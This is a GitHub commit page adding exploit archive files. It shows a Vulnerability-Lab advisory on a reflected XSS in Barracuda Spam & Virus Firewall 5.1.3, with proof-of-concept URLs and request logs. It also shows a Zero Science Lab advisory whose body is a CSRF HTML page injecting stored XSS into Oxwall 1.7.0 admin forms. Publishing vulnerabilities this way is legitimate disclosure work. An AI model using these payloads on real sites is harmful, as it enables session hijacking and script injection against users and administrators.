Skip to content

Commit 62bb042

Browse files
committed
added exploits for 28 july
1 parent b89976a commit 62bb042

28 files changed

Lines changed: 3777 additions & 0 deletions

1407-exploits/VL-1118.txt

Lines changed: 238 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,238 @@
1+
Document Title:
2+
===============
3+
Barracuda Networks Spam&Virus Firewall v5.1.3 - Client Side Cross Site Vulnerability
4+
5+
6+
References (Source):
7+
====================
8+
http://www.vulnerability-lab.com/get_content.php?id=1118
9+
10+
Barracuda Networks Security ID (BNSEC): BNSEC-1052
11+
https://www.barracuda.com/support/knowledgebase/501600000013lYI
12+
13+
Solution #00006606
14+
BNSEC-01052: Non-persistent XSS in Barracuda Spam and Virus Firewall v5.1.3
15+
16+
17+
Release Date:
18+
=============
19+
2014-07-25
20+
21+
22+
Vulnerability Laboratory ID (VL-ID):
23+
====================================
24+
1118
25+
26+
27+
Common Vulnerability Scoring System:
28+
====================================
29+
2.9
30+
31+
32+
Product & Service Introduction:
33+
===============================
34+
For efficient, effective corporate communication and collaboration, today’s organizations need more than just
35+
security against spam and malware. They need a comprehensive email governance solution that combines granular
36+
policy management, real-time visibility into email activity, and the ability to handle massive volume and
37+
huge files. Barracuda Spam & Virus Firewall is today’s solution for comprehensive email governance.
38+
39+
(Copy of the Vendor Product Homepage: https://www.barracuda.com/products/spamandvirusfirewall/ )
40+
41+
42+
Abstract Advisory Information:
43+
==============================
44+
The Vulnerability Laboratory Research Team discovered a client-side cross site vulnerability in the Barracuda Spam and Virus Firewall v5.1.3 (200,400 or 600) & Vx web-application.
45+
46+
47+
Vulnerability Disclosure Timeline:
48+
==================================
49+
2013-11-19: Researcher Notification & Coordination (Ateeq Khan)
50+
2013-11-19: Vendor Notification (Barracuda Networks Security Incident Team - Bug Bounty Program)
51+
2014-12-20: Vendor Response/Feedback (Barracuda Networks Security Incident Team - Bug Bounty Program)
52+
2014-07-15: Vendor Fix/Patch (Barracuda Networks Developer Team)
53+
2014-07-25: Public Disclosure (Vulnerability Laboratory)
54+
55+
56+
Discovery Status:
57+
=================
58+
Published
59+
60+
61+
Affected Product(s):
62+
====================
63+
Barracuda Networks
64+
Product: Spam & Virus Firewall 6.0.0.028 - 100 200 300 400 500 600 700 800 900 1000
65+
66+
67+
Exploitation Technique:
68+
=======================
69+
Remote
70+
71+
72+
Severity Level:
73+
===============
74+
Medium
75+
76+
77+
Technical Details & Description:
78+
================================
79+
A client-side cross site scripting web vulnerability is detected in the official Barracuda Spam & Antivirus Firewall Web-Application.
80+
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side).
81+
82+
The vulnerability is located in the `Per User Account View` module of the security appliance web-application. The vulnerable file is
83+
index.cgi and the affected value is `account`. Remote attackers can inject own malicious script codes on client-side. The attack
84+
vector of the issue is non-persistent and the request method to execute the malicious code is GET. Remote attackers can for example
85+
send manipualted links to priviledged application users to hijack session information (client-side) or execute non persistent codes.
86+
87+
The security risk of the non-persistent input validation web vulnerability is estimated as low with a cvss (common vulnerability
88+
scoring system) count of 2.9. The non persistent cross site vulnerability can be exploited by remote attackers without privileged
89+
application user account and with low or medium user interaction. Successful exploitation of the client-side cross site scripting
90+
web vulnerability results in session hijacking, client-side phishing, client-side unauthorized external redirects and client-side
91+
manipulation of the connected or affected module context.
92+
93+
Request Method(s):
94+
[+] GET
95+
96+
Vulnerable Module(s):
97+
[+] Users > Per User Account View
98+
99+
Vulnerable File(s):
100+
[+] index.cgi
101+
102+
Vulnerable Parameter(s):
103+
[+] account=
104+
105+
106+
Proof of Concept (PoC):
107+
=======================
108+
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged web-application user account and with
109+
low user interaction click. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
110+
111+
Manual steps to reproduce the security vulnerability ...
112+
113+
1. Login to the spam and antivirus firewall as normal guest user
114+
2. Once logged in, click on the Basic Tab once
115+
3. Now copy paste the following payload in the URL carefully after the password field replacing all other variables with our string
116+
117+
&primary_tab=USERS&new_secondary_tab=per_user_account_view
118+
&account=domainadmin@barracuda.comaf92c"><script>alert(1)</script>e352896d01c&auth_type=Local&locale=en_US
119+
&secondary_tab=per_user_change_password&page_submitted=true&content_only=1&domain=&user=guest&role=&ispopup=1
120+
&parent_name=pu_pref637248&popup_width=720&popup_height=500
121+
122+
4. You should now be able to see a javascript popup revealing the session cookies hence proving the existence of this vulnerability!
123+
124+
125+
PoC: Frame Inject
126+
https://spam.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1382217804&locale=en_US
127+
&password=03f27a30cecedbbda727698954077eec&primary_tab=USERS&new_secondary_tab=per_user_account_view
128+
&account=domainadmin@barracuda.comaf92c%3E%3Ciframe%20src=http://www.vulnerability-lab.com%3Ee352896d01c
129+
&auth_type=Local&locale=en_US&secondary_tab=per_user_change_password&page_submitted=true&content_only=1
130+
&domain=&user=guest&role=&ispopup=1&parent_name=pu_pref637248&popup_width=720&popup_height=500
131+
132+
PoC: Cookie Steal
133+
https://spam.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1382217804&locale=en_US
134+
&password=03f27a30cecedbbda727698954077eec&primary_tab=USERS&new_secondary_tab=per_user_account_view
135+
&account=domainadmin@barracuda.comaf92c%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ee352896d01c
136+
&auth_type=Local&locale=en_US&secondary_tab=per_user_change_password&page_submitted=true&content_only=1
137+
&domain=&user=guest&role=&ispopup=1&parent_name=pu_pref637248&popup_width=720&popup_height=500
138+
139+
140+
Review: Change Password - Mail Session Title
141+
<tbody><tr><td colspan="1" style="padding:0 0 5px 0;" valign="top" width="100%">
142+
<table border="0" cellpadding="0" cellspacing="0" width="100%">
143+
<tbody><tr><td class="TitleLeft"></td><td class="TitleTop">
144+
<table border="0" cellpadding="0" cellspacing="0" width="100%">
145+
<tbody><tr><td><a name="Change Password:domainadmin@barracuda.comaf92c>
146+
<iframe src=http://www.vulnerability-lab.com>e352896d01c">
147+
Change Password:domainadmin@barracuda.comaf92c><iframe src="http://www.vulnerability-lab.com">e352896d01c</td>
148+
149+
150+
151+
--- PoC Session Request Logs ---
152+
Request:
153+
--------
154+
GET /cgi-mod/index.cgi?auth_type=Local&et=1382217804&locale=en_US&password=03f27a30cecedbbda727698954077eec&primary_tab=USERS&new_secondary_tab=per_user_account_view&account=domainadmin@barracuda.comaf92c%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee352896d01c&auth_type=Local&locale=en_US&secondary_tab=per_user_change_password&page_submitted=true&content_only=1&domain=&user=guest&role=&ispopup=1&parent_name=pu_pref637248&popup_width=720&popup_height=500 HTTP/1.1
155+
Host: spam.ptest.cudasvc.com
156+
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
157+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
158+
Accept-Language: en-US,en;q=0.5
159+
Accept-Encoding: gzip, deflate
160+
DNT: 1
161+
Cookie: ys-preview_west=o%3Acollapsed%3Db%253A1; ys-preview_south=o%3Acollapsed%3Db%253A1; ys-preview_east=o%3Acollapsed%3Db%253A0
162+
Connection: keep-alive
163+
164+
Response:
165+
---------
166+
HTTP/1.1 200 OK
167+
Server: BarracudaHTTP 4.0
168+
Content-Type: text/html; charset=utf-8
169+
Connection: keep-alive
170+
Set-Cookie: ys-preview_west=o%3Acollapsed%3Db%253A1; path=/
171+
Set-Cookie: ys-preview_south=o%3Acollapsed%3Db%253A1; path=/
172+
Set-Cookie: ys-preview_east=o%3Acollapsed%3Db%253A0; path=/
173+
Expires: Thu, 18 Oct 2012 23:48:26 GMT
174+
Date: Fri, 18 Oct 2013 23:48:26 GMT
175+
Content-Length: 8325
176+
177+
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head>
178+
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
179+
<meta http-equiv="X-UA-Compatible" content="IE=edge">
180+
181+
...[Trimmed]...
182+
<a name="Change Password:domainadmin@barracuda.comaf92c"><script>alert(document.cookie)</script>e352896d01c"/>
183+
...[Trimmed]...
184+
185+
186+
Reference(s):
187+
https://spam.ptest.cudasvc.com/cgi-mod/index.cgi
188+
189+
190+
Solution - Fix & Patch:
191+
=======================
192+
The vulnerability can be patched by a secure parse of the account and session id echo when processing to reset passwords via the email address.
193+
Parse the parameter value input of the account and encode the output in the session values.
194+
195+
Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic) page or use the regular customer panel
196+
https://www.barracuda.com/support/knowledgebase/501600000013lYI
197+
198+
199+
Security Risk:
200+
==============
201+
The security risk of the client-side cross site scripting web vulnerability is estimated as medium.
202+
203+
204+
Credits & Authors:
205+
==================
206+
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]
207+
208+
209+
Disclaimer & Information:
210+
=========================
211+
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
212+
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
213+
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
214+
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
215+
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
216+
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
217+
218+
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
219+
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
220+
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
221+
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
222+
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
223+
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
224+
225+
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
226+
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
227+
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
228+
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
229+
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
230+
231+
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
232+
233+
234+
--
235+
VULNERABILITY LABORATORY RESEARCH TEAM
236+
DOMAIN: www.vulnerability-lab.com
237+
CONTACT: research@vulnerability-lab.com
238+

1407-exploits/ZSL-2014-5195.txt

Lines changed: 101 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,101 @@
1+
<!--
2+
3+
Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities
4+
5+
6+
Vendor: Oxwall Software Foundation
7+
8+
Product web page: http://www.oxwall.org
9+
Affected version: 1.7.0 (build 7907 and 7906)
10+
11+
Summary: Oxwall is unbelievably flexible and easy to use
12+
PHP/MySQL social networking software platform.
13+
14+
Desc: Oxwall version 1.7.0 suffers from multiple cross-site
15+
request forgery and stored xss vulnerabilities. The application
16+
allows users to perform certain actions via HTTP requests
17+
without performing any validity checks to verify the requests.
18+
This can be exploited to perform certain actions with administrative
19+
privileges if a logged-in user visits a malicious web site.
20+
Input passed to several POST parameters is not properly
21+
sanitised before being returned to the user. This can be
22+
exploited to execute arbitrary HTML and script code in a
23+
user's browser session in context of an affected site.
24+
25+
Tested on: Kali Linux 3.7-trunk-686-pae
26+
Apache/2.2.22 (Debian)
27+
PHP 5.4.4-13(apache2handler)
28+
MySQL 5.5.28
29+
30+
31+
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
32+
@zeroscience
33+
34+
35+
Advisory ID: ZSL-2014-5195
36+
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5195.php
37+
38+
39+
40+
18.07.2014
41+
42+
-->
43+
44+
45+
<html>
46+
<title>Oxwall 1.7.0 Multiple CSRF And Stored XSS Vulnerabilities</title>
47+
<body>
48+
49+
50+
<form action="http://192.168.0.105/admin/users/roles/" method="POST">
51+
<input type="hidden" name="form_name" value="add-role" />
52+
<input type="hidden" name="label" value='"><script>alert(1);</script>' />
53+
<input type="hidden" name="submit" value="Add" />
54+
<input type="submit" value="Execute #1" />
55+
</form>
56+
57+
58+
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
59+
<input type="hidden" name="form_name" value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6" />
60+
<input type="hidden" name="command" value="AddAccountType" />
61+
<input type="hidden" name="key" value="questions_account_type_5615100a931845eca8da20cfdf7327e0" />
62+
<input type="hidden" name="prefix" value="base" />
63+
<input type="hidden" name="accountTypeName" value="5615100a931845eca8da20cfdf7327e0" />
64+
<input type="hidden" name="lang[1][base][questions_account_type_5615100a931845eca8da20cfdf7327e0]" value='"><script>alert(2);</script>' />
65+
<input type="hidden" name="role" value="12" />
66+
<input type="submit" value="Execute #2" />
67+
</form>
68+
69+
70+
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
71+
<input type="hidden" name="form_name" value="qst_add_form" />
72+
<input type="hidden" name="qst_name" value='"><script>alert(3);</script>' />
73+
<input type="hidden" name="qst_description" value="ZSL" />
74+
<input type="hidden" name="qst_account_type[0]" value="290365aadde35a97f11207ca7e4279cc" />
75+
<input type="hidden" name="qst_section" value="f90cde5913235d172603cc4e7b9726e3" />
76+
<input type="hidden" name="qst_answer_type" value="text" />
77+
<input type="hidden" name="qst_possible_values" value="%5B%5D" />
78+
<input type="hidden" name="year_range[to]" value="1996" />
79+
<input type="hidden" name="year_range[from]" value="1930" />
80+
<input type="hidden" name="qst_column_count" value="1" />
81+
<input type="hidden" name="qst_required" value="" />
82+
<input type="hidden" name="qst_on_sign_up" value="" />
83+
<input type="hidden" name="qst_on_edit" value="" />
84+
<input type="hidden" name="qst_on_view" value="" />
85+
<input type="hidden" name="qst_on_search" value="" />
86+
<input type="hidden" name="valuesStorage" value="%7B%7D" />
87+
<input type="hidden" name="command" value="addQuestion" />
88+
<input type="submit" value="Execute #3" />
89+
</form>
90+
91+
92+
<form action="http://192.168.0.105/admin/restricted-usernames" method="POST">
93+
<input type="hidden" name="form_name" value='restrictedUsernamesForm"><script>alert(4);</script>' />
94+
<input type="hidden" name="restrictedUsername" value='"><script>alert(5);</script>' />
95+
<input type="hidden" name="addUsername" value="Add" />
96+
<input type="submit" value="Execute #4 & #5" />
97+
</form>
98+
99+
100+
</body>
101+
</html>

0 commit comments

Comments
 (0)